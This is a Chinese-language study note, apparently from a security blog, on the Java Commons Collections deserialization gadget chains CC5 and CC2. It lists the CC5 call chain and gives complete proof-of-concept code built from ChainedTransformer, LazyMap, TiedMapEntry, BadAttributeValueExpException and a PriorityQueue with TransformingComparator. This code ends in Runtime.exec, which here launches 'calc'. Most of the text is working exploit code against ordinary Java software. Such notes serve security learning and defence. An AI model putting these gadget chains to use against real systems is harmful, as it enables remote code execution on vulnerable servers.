java cc链5
BadAttributeValueExpException.readObject()
TiedMapEntry.toString()
LazyMap.get()
ChainedTransformer.transform()
ConstantTransformer.transform()
InvokerTransformer.transform()
Method.invoke()
Class.getMethod()
InvokerTransformer.transform()
Method.invoke()
Runtime.getRuntime()
InvokerTransformer.transform()
Method.invoke()
Runtime.exec()
从链路分析,与cc1的区别在于调用方法的不同,也就是LazyMap.get
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",
new Class[]{String.class, Class[].class},
new Object[]{"getRuntime", null}),
new InvokerTransformer("invoke",
new Class[]{Object.class, Object[].class},
new Object[]{null, null}),
new InvokerTransformer("exec",
new Class[]{String.class},
new String[]{"calc"}),
};
ChainedTransformer chainedTransformer= new ChainedTransformer(transformers);
HashMap<Object,Object> map=new HashMap<>();
Map<Object,Object> lazymap= LazyMap.decorate(map,chainedTransformer);
lazymap.get("test");
相同的地方直接复制,调用TiedMapEntry.toString()方法,在BadAttributeValueExpException的readObject方法中调用了
Object valObj = gf.get("val", null);
val = valObj.toString();
通过反射修改val的值,使得val变为TiedMapEntry即可
最后的poc为
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",
new Class[]{String.class, Class[].class},
new Object[]{"getRuntime", null}),
new InvokerTransformer("invoke",
new Class[]{Object.class, Object[].class},
new Object[]{null, null}),
new InvokerTransformer("exec",
new Class[]{String.class},
new String[]{"calc"}),
};
ChainedTransformer chainedTransformer= new ChainedTransformer(transformers);
HashMap<Object,Object> map=new HashMap<>();
Map<Object,Object> lazymap= LazyMap.decorate(map,chainedTransformer);
TiedMapEntry aaa = new TiedMapEntry(lazymap, "aaa");
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
Field val = badAttributeValueExpException.getClass().getDeclaredField("val");
val.setAccessible(true);
val.set(badAttributeValueExpException,aaa);
serialize(badAttributeValueExpException);
unserialize("person.bin");
cc链2 调用链 和cc4类似,只是执行命令的方式不同,cc4是字节码加载,cc2是反射加载调用,poc如下
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",
new Class[]{String.class, Class[].class},
new Object[]{"getRuntime", null}),
new InvokerTransformer("invoke",
new Class[]{Object.class, Object[].class},
new Object[]{null, null}),
new InvokerTransformer("exec",
new Class[]{String.class},
new String[]{"calc"}),
};
ChainedTransformer chainedTransformer= new ChainedTransformer(transformers);
TransformingComparator transformingComparator = new TransformingComparator(chainedTransformer);
PriorityQueue test = new PriorityQueue<>(transformingComparator);
// test.add(1);
// test.add(2);
Class aClass = test.getClass();
Field size = aClass.getDeclaredField("size");
size.setAccessible(true);
size.set(test,2);
// serialize(test);
unserialize("person.bin");